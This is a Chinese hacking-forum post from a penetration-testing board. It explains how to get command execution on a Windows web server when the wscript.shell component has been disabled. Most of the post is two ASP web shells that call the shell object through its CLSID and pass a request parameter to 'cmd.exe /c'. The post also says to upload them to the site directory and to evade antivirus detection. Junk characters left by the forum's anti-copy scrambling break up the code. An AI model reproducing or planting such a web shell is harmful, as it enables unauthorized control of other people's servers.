找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2614|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    9 Z& ~4 B: ?# L1 x9 ?) t
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。+ J- D5 n0 Z" G$ T
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    $ p5 f  }; x# c9 W
  • 把下面代码复制:, J+ t* F# C& H- j/ @% m  ?. O
  • <%$ {- S1 x/ n( e+ `+ I) B0 ~  \
  • end if9 b; S4 f, P& K3 L/ e$ l+ X
  • response.write(”")8 ^5 r0 P; @0 f+ R3 K& f
  • On Error Resume
    3 v7 U3 `& p% N2 e. M: r2 e
  • Next
    8 P7 i$ R$ y7 n  [
  • response.write oScriptlhn.exec(”cmd.exe /c” & 1 V$ N  c8 `4 n; ]
  • request(”c”)).stdout.readall
    ' w9 V  L0 N& I+ l8 Z
  • response.write(”")6 Y2 \5 S5 t$ @, X
  • response.write(”")9 b0 f$ R% {, p1 b6 v1 l' s6 `
  • response.write(”1 e6 a* @( n$ v* d3 x
  • “)
    8 X+ g* U# |9 k% A3 {3 X3 U4 r: C
  • response.write(”"); |. X4 n! k# Q, b* f% i
  • %>' S% O6 U! H  I
  • 保存为一个asp文件,然后传到网站目录上去
      Z4 Z; \5 `, y+ I: p
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    * l  U1 R9 y* z# V" |, c% b& o, p  n: G
  • 我用此成功运行过cacls命令。, X3 S; [' d8 R: }; S! g
  • 第二那就是运行时出错,可能限制某些代码执行
      o) j/ ~7 l/ z6 {7 B6 A
  • 无wscript.shell组件提权又一个方法
    1 x; k, v! Q( \) u2 E
  • <object runat=server id=oScriptlhn scope=page
    4 v( ~! h' W- a0 K: |  Y* M. r

  • 7 N5 y! _- u8 x
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    + Q: D+ ~  B) M
  • <%if err then%>   D) w9 h( X! o# j' W) J9 _
  • <object runat=server id=oScriptlhn scope=page ! ]/ G2 J7 J+ |/ L  ]8 \% k9 }, ?
  • , H3 G. c2 @# \0 l+ h! A; k
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>0 k  G9 D; `. U
  • <%
    " w% ?$ p$ s8 q$ p  Y' j% n7 r
  • end if
    + Z7 E* d( k; k: D2 T3 S
  • response.write(”<textarea readonly cols=80 . {$ `4 v. _, P% b7 N3 Q

  • 8 s6 f+ ^& D( c# j( Y3 a
  • rows=20>”)
    ) P  D/ w+ q2 N2 c
  • On Error Resume Next 9 c8 |* T0 L) A; O
  • response.write . U4 N. t& d# V9 z, k1 G( X3 ]( u
  • - S  s1 I, ?) B; _6 R* D
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    - @" W; g# k2 {. z* d
  • response.write(”</textarea>”)
    * x# W8 r. x' O7 c8 Q7 D& h
  • response.write(”<form 0 w* Y8 n$ ?  \9 |
  • - z8 O: E& ]- I) P
  • method=’post’>”)
    : K8 `' }- g9 D  H9 S1 j
  • response.write(”<input type=text name=’c' 3 t4 q( M3 i9 |4 s: d$ K9 j0 i

  • ) a7 |) j3 g0 ?$ V) n2 c4 \
  • size=60><br>”) ! K* O! G4 C7 u
  • response.write(”<input type=submit - [6 }& w. E0 ~, S. D4 H+ L( J6 X; j
  • 9 i  Q4 f: o) G0 x/ r8 I) |6 i6 Q
  • value=’执行’></form>”)
    . O; }) ?  L, C" b  P
  • %>3 G; r8 r# l( m& {" {" l: W8 g
  • 保存为ASP,此代码可能被杀,请注意免杀。+ z3 O2 a) f* g2 @) d+ {' O! i
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建7 X8 L% {) Q% A! Z, [5 Q* X* A/ N! w
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表